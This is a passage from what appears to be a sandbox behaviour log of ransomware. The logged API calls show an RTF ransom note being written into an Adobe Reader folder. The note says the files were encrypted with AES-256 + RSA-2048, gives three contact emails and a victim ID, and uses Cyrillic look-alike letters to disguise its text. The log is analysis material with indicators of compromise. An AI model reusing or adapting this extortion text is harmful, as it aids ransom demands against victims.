ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.555] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.556] CloseHandle (hObject=0x1fc) returned 1 [0064.556] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\bg85_info.rtf")) returned 0xffffffff [0064.556] GetLastError () returned 0x2 [0064.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.557] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 